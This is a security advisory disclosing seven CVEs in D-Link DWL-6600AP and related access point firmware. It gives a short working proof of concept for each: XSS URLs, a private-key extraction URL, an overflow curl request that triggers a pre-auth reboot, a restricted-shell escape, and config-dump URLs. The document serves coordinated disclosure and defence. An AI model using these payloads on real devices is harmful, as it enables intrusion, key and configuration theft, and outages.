D-Link 6600-AP XSS / DoS / Information Disclosure Vulnerabilities

# Security Advisory - 22/07/2019

## Multiple vulnerabilities found in the D-Link 6600-AP device running
the latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced
anymore but the support is still provided by D-Link as per described
on the D-Link website. Not that this product is built for business
customers of D-Link and we can expect to have thousands of devices at
risk. Code base shared with DWL-3600AP and DWL-8610AP

### This advisory is sent to D-Link the 22/05/2019
Many Thanks to the D-Link Security Team for their prompt reactivity!

### Affected Product
D-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP

### Firmware version
4.2.0.14 Revision Ax date:      21/03/2019

### Last version available
https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point

### Product Identifier
WLAN-EAP

### Hardware Version
A2

### Manufacturer
D-LINK

## Product Description
The DWL-6600AP is designed to be the best-in-class indoor Access Point
for business environments. With high data transmission speeds, load
balancing features, it can be deployed as a standalone wireless Access
Point or used as the foundation for a managed wireless network.
Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point

## List of Vulnerabilities

 1. CVE-2019-14338 - Post-authenticated XSS
 2. CVE-2019-14334 - Post-authenticated Certificate and RSA Private
Key extraction
through http command
 3. CVE-2019-14333 - Pre-authenticated Denial of service leading to
the reboot of the AP
 4. CVE-2019-14337 - Escape shell in the restricted command line interface
 5. CVE-2019-14335 - Post-authenticated Denial of service leading to
the reboot of the AP
 6. CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth)
 7. CVE-2019-14332 - Use of weak ciphers for SSH

### 1. Post-authenticated XSS
#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14338
#### Proof-of concept

Example 1: http://10.90.90.91/admin.cgi?action=<script>alert(document.cookie)</script>

Example 2: http://10.90.90.91/admin.cgi?action=+guest<script>alert('Pwned')</script>

### 2. Post-authenticated Certificate and RSA Private Key extraction
through http command
#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14334
#### Proof-of concept

http://10.90.90.91/sslcert-get.cgi?

Result of the command: File "mini_httpd.pem" automatically extracted

### 3.  Pre-authenticated Denial of service leading to the reboot of the AP
#### Exploitation: Local
#### Severity Level: High
#### CVE ID: CVE-2019-14333
#### Proof-of concept
   kali# curl -X POST
'http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

### 4. Escape shell in the restricted command line interface
#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14337
#### Proof-of concept

DLINK-WLAN-AP# wget
Invalid command.
DLINK-WLAN-AP# `/bin/sh -c wget`
BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary.
Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet]
[-O|--output-document FILE]
        [--header 'header: value'] [-Y|--proxy on/off] [-P DIR]
        [--no-check-certificate] [-U|--user-agent AGENT][-T SEC]  URL

Retrieve files via HTTP or FTP

Options:
        -s      Spider mode - only check file existence
        -c      Continue retrieval of aborted transfer
        -q      Quiet
        -P DIR  Save to DIR (default .)
        -T SEC  Network read timeout is SEC seconds
        -O FILE Save to FILE ('-' for stdout)
        -U STR  Use STR for User-Agent header
        -Y      Use proxy ('on' or 'off')

DLINK-WLAN-AP#

### 5. Post-authenticated Denial of service leading to the reboot of the AP
#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14335
#### Proof-of concept

http://10.90.90.91/admin.cgi?action=%s

### 6. Post-authenticated Dump all the config files
#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14336
#### Proof-of concept

http://10.90.90.91/admin.cgi?action=

### 7. Use of weak ciphers
#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14332
#### Proof-of concept

[email protected]:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1
The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established.
RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts.
[email protected]'s password:
Enter 'help' for help.

DLINK-WLAN-AP# help

## Report Timeline
22/05/2019 : This advisory is sent to D-Link - the contents of this
Report will be made public within 30 days.
22/06/2019 : Public release of the security advisory to mailing list

## Fixes/Updates
ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip
ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip


## About me - [email protected]
#### Independent EMSecurity Researcher in the field of IoT under the Sun
#### Always open to hack and share
#### Greetings - Ack P. Kim and others for the online resources

#  0day.today [2019-12-04]  #